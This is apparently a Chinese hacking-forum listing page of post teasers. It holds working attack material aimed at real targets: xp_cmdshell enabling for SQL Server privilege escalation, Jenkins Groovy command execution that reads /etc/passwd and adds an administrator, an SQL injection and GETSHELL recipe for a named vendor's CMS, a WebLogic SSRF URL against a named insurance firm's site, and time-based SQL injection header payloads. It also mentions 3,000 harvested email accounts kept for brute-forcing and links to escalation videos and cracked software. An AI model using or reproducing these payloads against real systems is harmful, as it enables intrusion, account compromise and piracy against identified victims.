意外得到163,3000个邮箱账号,剩下的就是爆破了
意外得到163,3000个邮箱账号,剩下的就是爆破了...
1433 SA 升权代码
1433 SA 升权代码碰到SA权限降权的时候需要在SQL查询分析器里,输入EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;即可升权代码...
Jenkins CommonCollections
Jenkins CommonCollectionsprintln "cat etc/passwd".execute().text 需要配合SSH反弹WIN println "net localgroup administrators xxx/add".execute().text...
某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL
某企业CMS管理系统存在通用SQL注入漏洞+GETSHELL 作者:0X80inurl:index.php?ie=
技术支持: 宝鸡市世纪网络技术有限公司默认后台:Adm/governlgn.php 或者 Admin/governlgn.php均存在POST注入进入后台,可设置上传类型,直接GETSHELL,不要做坏事额...
0x80历届视频教程经典回顾(提供下载)
0x80历届视频教程经典回顾(提供下载)XP系统内网提权下载地址:http://pan.baidu.com/s/1dD3riTz全手工php注射+注入root+hex,mid函数,load_filehttp://pan.baidu.com/s/1jGxaq7Glinux 提权 http://pan.baidu.com/s/1o6I8pLK ;解压密码:80bad实战秒掉某银行http://pan.baidu.com/s/1jGFsZky...
江泰保险经纪股份有限公司某站Weblogic SSRF漏洞可探测内网
江泰保险经纪股份有限公司某站Weblogic SSRF漏洞可探测内网http://bms.jiangtai.com/uddiexplorer//SearchPublicRegistries.jsp?operator=http://localhost:29001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&...
JAVA编程系列课程
JAVA编程系列课程 作者:0X80这是我之前做的一套课程,主要针对想接触了解JAVA的朋友,后期几课再补上,希望大家支持,谢谢1、java 编程语言基本功能及特点2、Java 第1个java程序,JAVA开始之旅3、java if for 循环的实例4、java jframe 图形界面框架编写实例5、java list 集合与数组溢出实例6、 java 编程面向对象 思想7、JAVA类,对象,构造方法8、JAVA线程 T...
http头注入测试技巧
http头注入测试技巧玩够了常见的get和POST,但是面对http头部注入,可能这章需要了解下 首先准备modify headers以及 Live HTTP headers首先在modify headers里面添加X-Forwarded-For 或者client_ip添加参数可以为WVS默认的:if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if...
DbVisualizer 9.2.14破解版
DbVisualizer 9.2.14破解版http://www.onlinedown.net/softdown/21913_2.htm我一般用于测试IBM DB2数据库很好用,用之前先加载IBM的JAR架包...
metaploit scanner与smb攻击模块
我们一般可以用kali scanner模块进行探测网络的安全性随便在网络上找一个地址如www.x14hack.com接着带入kail中23.238.132.247|www.x14hack.com|CDN或代理[u117.getiis.com]首先打开msfconsole查看当前可用辅助模块show auxiliary接着我们来探测下23.238.132.247网段的FTP安全首先输入探测VNC SMB...